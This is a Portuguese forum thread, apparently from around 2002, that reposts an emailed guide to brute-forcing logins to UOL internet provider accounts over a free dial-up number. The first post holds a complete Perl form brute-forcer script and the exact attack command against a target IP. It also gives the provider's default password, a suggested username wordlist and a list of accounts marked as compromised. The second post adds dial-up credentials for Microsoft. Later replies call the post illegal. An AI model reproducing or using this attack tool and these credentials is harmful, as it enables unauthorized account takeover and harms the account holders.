Tópico Fechado
  1. #1
    RFT
    RFT está offline
    Membro
    Info Conteúdo e Citações Jogos Mensageiros
    Registro
    Oct 2002
    Mensagens
    282
    Verdinhas
    14

    Recebi algo por email, porem não sei se é ilegal postar aqui, vejam.

    E-mail Premium BOL
    Antivírus, anti-spam e até 100 MB de espaço. Assine já!
    http://email.bol.com.br/


    Como obter senhas do provedor UOL usando um numero de conexão gratuito - by
    2se7en - [email protected]

    http://www.2se7en.kit.net/2se7en/
    http://www.2se7en.kit.net/2se7en/index.html

    ---------------------------------------------------------------------------
    -----


    O provedor UOL disponibiliza as pessoas que ainda não são clientes um CD de
    instalação do navegador IE (Internet Explorer).
    Depois que é feita a instalação do browser, automaticamente é criada uma
    configuração dial-up com os dados do UOL.
    O numero é um 0800, portanto a ligação será gratuita: 0800-158002.
    O login e a senha são uma verdadeira propaganda - universo para login e
    online para senha.
    Quando o modem conecta a conecção fica restrita a apenas uma página:
    https://gasset.uol.com.br/cadgeral/index_0800.htm
    Essa página resolvida fica: 200-221-9-93.portais-uolinc.uol.com.br com o ip
    200.221.9.93.
    O client ip, ou seja, o ip da pessoa que conectou fica algo parecido com
    10.1.1.1~254.
    Em relação a página restrita
    (https://gasset.uol.com.br/cadgeral/index_0800.htm) foi um engano meu.
    Uma vez, sem querer, eu estava dando uma olhada numa página do portal UOL
    chamada "serviço ao assinante". Essa página é usada para fazer alterações
    cadastrais, senha e endereço.
    Pra minha surpresa eu vi que o dominio era exatamente o gasset.uol.com.br.
    Fiz alguns testes dessas páginas conectado pelo numero gratuito e todas que
    começavam com esse dominio funcionaram.
    As páginas são:

    https://gasset.uol.com.br/pl_cad/altera_senha
    https://gasset.uol.com.br/pl_cad/altera_tipo_login
    https://gasset.uol.com.br/pl_cad/consulta_horas_login
    https://gasset.uol.com.br/pl_cad/muda_dados_cob
    https://gasset.uol.com.br/pl_cad/ver...enha_suspensao

    Usando um script em Perl eu fiz vários testes com um nome de usuário e uma
    senha que realmente existem.

    Depois que vc coloca os dados do usuário no script ele vai verificar se tal
    palavra existe na página. Por exemplo, eu fiz testes na página
    https://gasset.uol.com.br/pl_cad/altera_tipo_login, quando login e senha
    não estão corretos vai aparecer a palavra ou frase "login ou senha
    incorretos, tente novamente". Quando se tem exito irá aparecer algo como
    "escolha seu novo plano".
    A partir dessa lógica o script vai separando esses logins com exito.
    Criei um arquivo de lote (.bat) para não ficar digitando esses comandos
    enormes. Ficou assim:

    perl bf.pl -U http://200.221.9.93/pls/dadias/altera_tipo -m POST -u us.txt
    -p ps.txt -l P_NOME_ACESSO -w P_SENHA -o B_ALTERAR=Alterar -f tentar -s
    senhas.txt -h /pls/dadias/altera_tipo

    A palavra "perl" se refere ao executável da linguagem de programação Perl.
    Para quem usa Linux não tem problema pois já deve estar instalado. Para os
    usuários do Windows existe uma versão de cerca de 5mb que pode ser obtida
    na página www.activestate.com

    bf.pl é o nome do script.

    -U http://200.221.9.93/pls/dadias/altera_tipo é nome da página para se
    obter as informações. Note que eu tive que colocar o ip ao invés do
    hostname pois o perl não estava aceitando a página segura https:// e mudei
    tambem a página de "pl_cad/altera_tipo_login" para "pls/dadias/altera_tipo"
    que é o local que vão ser enviados o login e a senha (como pose ser visto
    no source da página após o comando POST).

    -m POST é o método utilizado para enviar informações para um local. Para se
    obter informações seria usado o comando -m GET.

    -u us.txt indica que o arquivo us.txt contem nomes de usuários.

    -p ps.txt indica que o arquivo ps.txt contem as senhas para se fazer as
    tentativas. A senha inicial dos usuários do UOL é 123mudar.

    -l P_NOME_ACESSO comando contido dentro da pagina em HTML que informará
    qual o nome do usuário.

    -w P_SENHA comando contido dentro da pagina em HTML que informará qual
    senha será combinada com o username.

    -o B_ALTERAR=Alterar comando que confirma que é pra ser feito a alteração
    de tipo de login. Será sempre esse não precisando ter um arquivo com mais
    combinações.

    -f tentar esse comando que indica se houve sucesso de login ou não. Caso
    tenha a página com sucesso vai conter a palavra "tentar".

    -s senhas.txt arquivo que conterá os logins e senhas com sucesso e sem
    sucesso. Para separar os logins eu sugiro que seja usado o Excel ou outro
    programa e seja feito uma filtragem no menu Dados => Classificar =>
    colunas.

    -h /pls/dadias/altera_tipo local onde serão enviadas essas informações
    dentro de tal dominio.

    Estou passando essa informação pra frente para alertar os usuários do UOL
    dessa falha. Mas para aqueles que querem tirar proveito, o que que eu posso
    fazer?...

    Segue abaixo o script bf.pl. Pode se tentar manualmente mas não recomendo.



    ---------------------------------------------------------------------------
    -----

    ---------------------------------------------------------------------------
    -----



    #!/usr/bin/perl
    #
    #
    # @2002M.eiszner [email protected]
    # form-based authentication brute forcer
    #
    # passfile accepts special vars:
    # %%UID%% username
    # %%UIDREV%% username-reverse
    #
    ########################################

    $|=1;

    use strict;
    use Getopt::Std;
    use LWP::UserAgent;
    use HTTP::Request::Common;
    use HTTP::Response;

    ## get options
    ##
    use vars qw($opt_m $opt_U $opt_u $opt_p $opt_l $opt_w $opt_o $opt_v $opt_f
    $opt_s $opt_h);
    getopts("U:m:u:p:l:w:o:p:v:f:s:h:");

    ## vardecs
    ##
    my $method = $opt_m || "GET";
    my $url = $opt_U;
    my $userfile = $opt_u;
    my $passfile = $opt_p;
    my $uservar = $opt_l || "username";
    my $passvar = $opt_w || "password";
    my $others = $opt_o || "";
    my $proxy = $opt_v || "";
    my $failure = $opt_f;
    my $logfile = $opt_s;
    my $header = $opt_h;

    ## hash for postreqs and headerinfos
    ##
    my %PARAMS;
    my %HEADERS;

    ## check that
    ##
    if (!$url || !$userfile || !$passfile || !$failure)
    {
    print "\nusage: $0 -U [url]\n\t-m [method ( GET|POST )]\n\t-u
    [usernameFile]";
    print "\n\t-p [passwordFile]\n\t-l [loginVariable]\n\t-w [passVariable]";
    print "\n\t-o [otherVariables ( ie: submit=true&login=yes )]";
    print "\n\t-v [proxyServer]\n\t-f [failureString]\n\t-s [saveFilename]";
    print "\n\t-h [request-headers( ie: Referer:abc&Cookie:ng=omo )]\n\n";
    exit 11;
    }

    ## input validation
    ##

    if ($url !~ /http:\/\//i && $url !~ /https:\/\//i)
    {
    $url = "http://".$url;
    }
    $url =~ s/[\n\r]//g;

    ## create user-agent
    ##

    my $response;
    my $ua = new LWP::UserAgent;
    $ua->agent("Mozilla/4.0(compatible;MSIE 6.0;Windows NT 5.0)");
    $ua->proxy('http', $proxy) if($proxy ne '');

    ## resultfile
    if ($logfile ne '')
    {
    open (RF, "> $logfile") || die "cant open $logfile !?!\n";
    }

    ## userloop
    open (UF, "< $userfile") || die "cant open $userfile !?!\n";

    while(<UF>)
    {
    my $uid = $_;
    $uid =~ s/[\n\r]//g;

    ## passloop
    open (PF, "< $passfile") || die "cant open $passfile !?!\n";

    while(<PF>)
    {
    my $pwd = $_;
    $pwd =~ s/[\n\r]//g;

    ## check password for specialities
    ##
    $pwd = &special($uid,$pwd);

    ## fill hash with
    ## parameters
    ##
    $PARAMS{$passvar} = $pwd;
    $PARAMS{$uservar} = $uid;
    my @pairs;
    my ($key,$val,$k,$v,$si);
    @pairs = split(/&/,$others);

    ## fill params hash with
    ## all possible additional
    ## params
    ##
    foreach $si (@pairs)
    {
    ($k,$v) = split(/=/,$si);
    $PARAMS{$k} = $v;
    }

    ## check out all the headers
    ## and fill the HEADERS-hash
    ##
    my @hpairs;
    $si = $k = $v = "";
    @hpairs = split(/&/,$header);

    foreach $si (@hpairs)
    {
    ($k,$v) = split(/:/,$si);
    $HEADERS{"$k"} = $v;

    }

    ## the request itselve
    ## due to forms only GET
    ## and POST make sense
    ##

    if ($method eq "POST")
    {
    $response = $ua->request(POST "$url", \%PARAMS, %HEADERS);
    }
    else
    {
    my $reqstr = "$url?$uservar=$uid&$passvar=$pwd&$others";
    $reqstr =~ s/[\n\r]//g;
    $response = $ua->request(GET "$reqstr", %HEADERS);
    }

    ## check the response and
    ## write into resultfile
    ## and stdout
    ##

    my $page = $response->content();
    my $code = $response->code();

    if ($code eq "200" && $page !~ /$failure/ig)
    {
    print "$uid:$pwd *** WORKED ***\n";
    print RF "$uid:$pwd *** WORKED ***\n" if ($logfile ne '');
    }
    else
    {
    print "$uid:$pwd ($code)\n";
    print RF "$uid:$pwd ($code)\n" if ($logfile ne '');
    }


    } # endpassloop
    close (PF);

    } # enduserloop

    close (UF);
    close (RF) if ($logfile ne '');


    ### end main begin subs
    ###
    ### sub special (pwd,uid)
    ### returns pwd

    sub special
    {
    my $u = shift;
    my $p = shift;

    ## check for %%UID%% in password
    ##
    $p =~ s/%%UID%%/$u/ if($p =~ /%%UID%%/);

    ## check for %%UIDREV%% in password
    ##
    if ($p =~ /%%UIDREV%%/)
    {
    my $tmp = "";
    my $c = 0;

    for ($c=length($u);$c>=0;$c--)
    {
    $tmp .= substr($u,$c,1);
    }
    $p =~ s/%%UIDREV%%/$tmp/;
    }

    ## done
    ##
    return $p;
    }




    ---------------------------------------------------------------------------
    -----

    ---------------------------------------------------------------------------
    -----


    Pequeno help:

    usage: bf.pl -U [url]
    -m [method ( GET|POST )]
    -u [usernameFile]
    -p [passwordFile]
    -l [loginVariable]
    -w [passVariable]
    -o [otherVariables ( ie: submit=true&login=yes )]
    -v [proxyServer]
    -f [failureString]
    -s [saveFilename]
    -h [request-headers( ie: Referer:abc&Cookie:ng=omo )]


    ---------------------------------------------------------------------------
    -----


    Sugestão para o arquivo ps.txt:

    123mudar -> essa SENHA funciona que é uma beleza!
    12345
    123456

  2. # Publicidade
    Publicidade

  3. #2
    RFT
    RFT está offline
    Membro
    Autor do tópico
    Info Conteúdo e Citações Jogos Mensageiros
    Registro
    Oct 2002
    Mensagens
    282
    Verdinhas
    14

    ---------------------------------------------------------------------------
    -----


    Sugestão para o arquivo us.txt:

    Sugiro que seja usado um programa gerador de caracteres. Ficaria mais ou
    menos assim:

    9v
    9w
    9x
    9y
    9z
    90
    91
    92
    93
    94
    95
    96
    97
    98
    99
    aaa
    aab
    aac
    aad
    aae
    aaf
    aag
    aah
    aai
    aaj
    aak
    aal
    aam
    aan
    aao
    aap
    aaq
    aar
    aas
    aat
    aau
    aav
    aaw
    aax
    aay
    aaz
    aa0
    aa1
    aa2
    aa3

    Existem um na Internet cujo executável é DICTMAKE.EXE
    Segue sua descrição já que eu não sei onde encontrei.

    Dictionary Maker v1.0 (C) 1995 CRiS
    -----------------------------------
    You say you want REAL brute force
    cracking? This is the program for
    you! Makes dictionary file from
    lower/uppercase alpha, 0-9, extend-
    ed ASCII and punchtuation. Even
    shows you how much disk space left!
    ---------------------------------------------------------------------------
    -----


    Lista com algumas senhas que funcionaram:

    b7:123mudar *** WORKED
    do:123mudar *** WORKED
    gy:123mudar *** WORKED
    hv:123mudar *** WORKED
    h5:123mudar *** WORKED
    j5:123mudar *** WORKED
    k1:123mudar *** WORKED
    ll:123mudar *** WORKED
    ow:123mudar *** WORKED
    oy:123mudar *** WORKED
    o2:123mudar *** WORKED
    rj:123mudar *** WORKED
    ro:123mudar *** WORKED
    s1:123mudar *** WORKED
    uq:123mudar *** WORKED
    vw:123mudar *** WORKED
    x5:123mudar *** WORKED
    yj:123mudar *** WORKED
    y7:123mudar *** WORKED
    29:123mudar *** WORKED
    31:123mudar *** WORKED
    38:123mudar *** WORKED
    4c:123mudar *** WORKED
    4j:123mudar *** WORKED
    44:123mudar *** WORKED
    5m:123mudar *** WORKED
    61:123mudar *** WORKED



    ---------------------------------------------------------------------------
    -----



    Estou bem despreocupado pois não sou usuário do UOL.
    O login e senha obtido pode muito bem ser usado para entrar nas página com
    acesso restrito, ou seja, aquelas revistas do conteudo exclusivo do UOL.


    ---------------------------------------------------------------------------
    -----


    A um certo tempo atrás eu tambem estava fazendo testes com um numero de
    conexão da Microsoft:

    0800780856
    LOGIN - [email protected]
    SENHA - icw5

    As páginas em questão são a msn.com e a hotmail.com
    Pena que só é possivel ficar conectado por 15 minutos e com velocidade
    máxima de 33 bps.

    Quem quiser tentar...

    Falow



    2se7en - [email protected]


    P.S. As carinhas são partes do código, seria trocar o ematicon pelo codigo dele.

  4. #3
    Suspenso
    Info Conteúdo e Citações Jogos Mensageiros
    Registro
    Dec 2002
    Mensagens
    218
    Verdinhas
    0

    Nao é ilegal nao....
    Os UOL é kem ta mandando esses e-mail...

  5. #4
    Suspenso
    Info Conteúdo e Citações Jogos Mensageiros
    Registro
    Aug 2002
    Mensagens
    2.281
    Verdinhas
    0

    Claro que é ilegal.

    Topic Closed.

  6. #5
    Suspenso
    Info Conteúdo e Citações Jogos Mensageiros
    Registro
    Dec 2002
    Mensagens
    0
    Verdinhas
    2842

    porra neguinho vai ter esse trabalhao pra entrar numa bosta duma pagina da uol ???eoauheuaheuihauiehaiuheaih

Tópico Fechado Ir para o Fórum

Assuntos do tópico

Compartilhar

Permissões